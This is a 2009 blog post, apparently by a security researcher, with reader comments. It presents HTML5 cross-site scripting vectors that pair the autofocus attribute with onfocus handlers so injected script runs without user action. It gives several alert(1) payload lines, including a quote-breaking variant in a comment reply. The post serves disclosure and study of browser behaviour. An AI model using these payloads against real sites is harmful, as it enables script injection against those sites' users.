HTML5 new XSS vectors
Sunday, 6 December 2009
So I posted some new XSS vectors on twitter and I thought I’d share them on the blog in case anyone missed them. Safari, Chrome and Opera all support these now 🙂 We have a brand new way of auto executing XSS.
Normally when you find a XSS hole within a input element that has filtered < and > you can’t exploit it automatically without using CSS expressions. The injection looks something like:-
<input type="text" USER_INPUT>
Here you can do style=xss:expression(alert(1)) or moz-binding etc. but it only works on a limited number of browsers. HTML5 however lets us execute like expressions but without css styles. For example:-
<input type="text" AUTOFOCUS onfocus=alert(1)>
We use the “autofocus” feature to focus our element and then the onfocus event to execute our XSS. This works with a plethora (I like that word) of tags. Any form based element it seems you can use this method:-
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
No. 1 — December 10th, 2009 at 9:50 pm
Really interesting and scary … 🙂
No. 2 — December 19th, 2009 at 5:39 pm
Great Work !
Its Featured,
http://hackerthedude.blogspot.com/2009/12/new-html-5-xss-vectors-by-gareth-heyes.html
Regards,
No. 3 — May 14th, 2010 at 6:23 am
thank you~
No. 4 — May 14th, 2010 at 8:01 am
I admit that I don’t quite get what he’s driving at. In most cases, if the user input can contain any characters like spaces, you’d have your server-side script do
<input type=text value=”[USER INPUT]”>
as otherwise only the first word before the first space gets taken as a value? Then you’d strip out any double-quotes as well as part of your sanitisation. So in his examples you’d end up with
<input type=text value=”autofocus onfocus=alert(1)”>
which I don’t think executes?
No. 5 — May 14th, 2010 at 8:41 am
@Patrick
Well that’s how XSS works, devs forget to filter the quote or others and you can inject your own scripts. BTW spaces aren’t required either for example:-
<input value=””onfocus=”alert(1)”autofocus/”>